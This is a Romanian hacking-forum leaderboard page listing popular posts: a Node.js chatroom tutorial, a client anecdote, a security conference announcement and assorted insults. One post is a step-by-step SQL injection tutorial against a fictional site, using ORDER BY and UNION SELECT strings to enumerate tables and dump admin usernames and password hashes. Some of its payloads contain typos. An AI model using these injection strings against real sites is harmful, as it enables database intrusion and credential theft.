Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/15/19 in all areas

  1. Salut, in acest tutorial o sa arat cum putem face un ChatRoom (Cu tot cu host). Pasul 1 - Ne facem cont pe Repl.It (Ne putem loga si cu gmail). Eu am un cont facut special pentru tutoriale pe acest forum. Link: https://repl.it/ Pasul 2 - Facem un repl de Nodejs si il numim "server" (sau ce nume vrem). Pasul 3 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 4 - In index.js copypaste la urmatorul cod: https://pastebin.com/pfNEcACv Pasul 5 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/2dRvEwvt Pasul 6 - In package.json copypaste la urmatorul cod: https://pastebin.com/Fjg073BQ Pasul 7 - Dam run la repl-u' nostru, asteptam sa instaleze tot ce e de instalat si dupa ce termina copiam linku' de la repl-u' nostru (o sa avem nevoie de el mai tarziu): Pasul 8 - Mai facem un repl de nodejs si il numim "ChatRoom" (sau ce nume vrem). Pasul 9 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 10 - In index.js copypaste la urmatorul cod: https://pastebin.com/a5j9MPNa Pe linia de cod 4 unde scrie: var socket = io("Link"); in loc de "link" punem link-u' de la repl-u' ce-l facusem inainte. (Repl-u' cu numele server sau ce nume a-ti pus). Pasul 11 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/sABUuGCB Pasul 12 - In package.json copypaste la urmatorul cod: https://pastebin.com/xtgv9pMr GATA DAM RUN SI DESCHIDEM LINK-U DE LA REPL-U' "CHATROOM" SAU CUM L-ATI NUMIT. SI IL DAM PERSOANEI CU CARE VREM SA COMUNICAM PE ACEL CHATROOM LINK DE LA CHATROOM-UL CE L-AM FACUT PENTRU ACEST TUTORIAL: https://chatroom.tutorialerepl.repl.run/
    1 point
  2. Ai explicat fain,Felicitari si bine ai venit.Incearca sa postezi ceva continut mai ok si nineni nu o sa mai zica nimic.BAFTA!
    1 point
  3. Am fost odată să mă întâlesc cu un client potențial, ceva patron de „firmă de construcții”, pentru site și promovare online. Zice omul, hai la mine la birou, într-un cartier de la marginea orașului. Zic ok. Îl iau pe colegul de la firmă și hai să mergem acolo, să vedem despre ce e vorba. Ajungem la adresă, era doar un șantier..mă rog, șantier e mult spus, era o bucată de pământ cu niște materiale pe ea. Nimeni în jur. Îi fac lu colegu, hai să îl sunăm pe ăla, dar chiar atunci the big boss apare. Big pentru că era ditamai balabusta, 200kg pe metru pătrat. Cu o mașină, desigur, de patron. Dacia Solenza care cred că pe drum a mai lăsat 3 bucăți de tablă ruginită amintire pe undeva. Prima impresie era clară. Întrebăm de birou, că venisem cu laptopul, să îi arătăm x, y, face omul că „aa, nu, că eu n-am birou. aici aveam treabă și de aia v-am chemat”. Ok.... - Păi și cum facem, discutăm aici, pe stradă? - Da, hai, ziceți care e treaba. - Uite domle, așa, așa, vă facem un site, începem SEO pe el, între timp facem reclame plătite pe Google și Facebook, etc. - Bun..și bani? Că eu am mai discutat cu niște firme din oraș dar mi-au cerut mult, tare mult. Prea mulți bani. Pentru un site...nu se poate așa ceva... Mă uit la colegul și deja nu mirosea a bine, ne-am pierdut timpul degeaba, în gândul meu. ...hai, ziceți cât vreți. - Păi..na..dacă tot ați zis că v-au cerut mult ceilalți, spuneți-ne cât v-au cerut și vedem, ajungem până la urmă la o concluzie. - Unul mi-a cerut 400 lei și altul 300 pe site. Mult, prea mult. Mulți bani. Nu se poate așa ceva. Ne-am cărat de acolo și râdeam în mașină de situație. Care firmă de construcții, ăla dacă lua o lucrare la un coteț rămânea fără muncitori. Cam așa e și cu voi, ăștia, de nu știți ce vreți dar știți cât costă .
    1 point
  4. Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL. Eu am sa pun urmatorul site fictional: https://victimescu.com/index.php?id=5 Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul ('). Daca acesta este vulnerabil va scrie urmatoarea chestie: You have an error in your SQL syntax; check the manual that corresponds to your….. Continued Daca acesta nu este vulnerabil, site-ul nostru va functiona normal. In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus. - Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL. https://victimescu.com/index.php?id=5 ORDER BY 5 - Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date. Incercam sa marim numarul cu 10. https://victimescu.com/index.php?id=1 ORDER BY 15- Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente. Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane. Acum continuam doar cu parametrul (UNION SELECT). https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9 In continuare trebuie sa apara 2 numere care indica unde facem injectarea. ------------------------------------------------- Un numar din cele 2 va fi boldit. ------------------------------------------------- Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5. https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date. CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda: https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()- in continuare o sa ne apara: -useri -parole -email-uri -etc https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database- Aceasta comanda a fost folosita pentru a afla parola de la panel. ------------------------------------------------- Deseori parola va fi in format MD5 ------------------------------------------------- Acesta a fost tutorialul si sper sa fie folosit in scopuri bune.
    1 point
  5. Salutare all, In curand lansam acesta conferinta in Bucuresti, 17-18 Octombrie. HTZ pune accent foarte mare pe Ethical Hacking, iar dupa cum stim din ce in ce mai des apar incidente majore in industrie (data breaches or damage). Noi ne deosebim fata de alte conferinte prin challenge-urile de pen-testing, facute in totalitate de staff-ul nostru. Prin aceste challenge-uri va punem la incercare creativitatea si totodata skill-urile voastre de: pen-testing, scripting, social engineering, crypto si multe altele. Scopul nostru este va aruncam in mijlocul actiunii, sa ne indepartam putin de platformele online, sa interactionam mai mult face to face, sa ne cunoastem si altfel ... nu doar dupa NickName :). Challenge-urile incep in data de 11-12 Octombrie si o sa fie nevoie de deplasare prin Bucuresti, in diferite Geo Locations pentru a finaliza challenge-urile. Fiecare challenge te va ghida catre alt challenge! Evident, exista niste reguli pentru aceste challenge-uri, aceste reguli se regasesc pe website-ul nostru https://www.hackthezone.com/tickets/rules-and-tactics . La finalul acestor challenge-uri, ne vedem cu totii la conferinta din data de 17-18 Octombrie, in Crystal Palace Ballrooms, Calea Rahovei 198A, Sector 5. Da, o sa fim si noi pe scena sa va prezentam fiecare challenge cum trebuia rezolvat (walkthrough scenarios) si decernarea premiului. Premiul este luat de o singura persoana, the best of the best! Poti sa participi si cu echipa. Nu este nici o problema, dar tot cel mai bun timp facut de o persoana o sa fie premiat :D la final ... va impartiti voi premiul. La conferinta o sa avem mai speakers de top ce vor ilustra diferinte puncte de vedere despre IT Security, cum evolueaza atacatorii, cum am putea sa ne aparam mai bine si nu numai. Biletele pot fi achizitionate de aici : https://www.iabilet.ro/bilete-hackthezone-conference-challenges-43985 Website-ul nostru o sa fie in permanentat actualizat, iar mici detalii pot fie modificate sau imbunatatite. Pentru intrebari sau nelamuriri, puteti sa ne gasiti si pe canalul nostru de Slack la : https://www.hackthezone.com/slack . Have fun! AlexHTZ
    1 point
  6. Esti un terminat daca dupa ce ti-am dat downvote ai inceput sa creezi conturi sa imi dai downvote. Fa ceva cu viata ta
    0 points
  7. Aha, si package-lock.json ce face? Puneti ba mana si invatati ce fac tool-urile pe care le folositi. Voi chiar puteti sa fiti multumiti de voi in halul asta?
    0 points
  8. Nu mai bine iti vezi tu de viata si te opresti in a-ti share-ui ideile ?
    -1 points
  9. Dar mai pe scurt package.json ofera o varianta ez de a "urmări" pachetele care sunt utilizate în aplicație/program. " { "main": "index.js", "dependencies": { "socket.io-client": "2.1.1", "chalk": "2.4.1", "prompts": "1.2.0" } } " wow
    -1 points
  10. de ce a traversat gaina strada ?
    -2 points
  11. -3 points
  12. -3 points
  13. i l-am facut si eu azi noapte. A disparut subit cu codul
    -3 points
  14. -3 points
  15. De ce nu stergeti si voi threadurile astea sa nu mai vina lumea sa cerseasca?
    -3 points
  16. Hacker adevarat
    -3 points
×
×
  • Create New...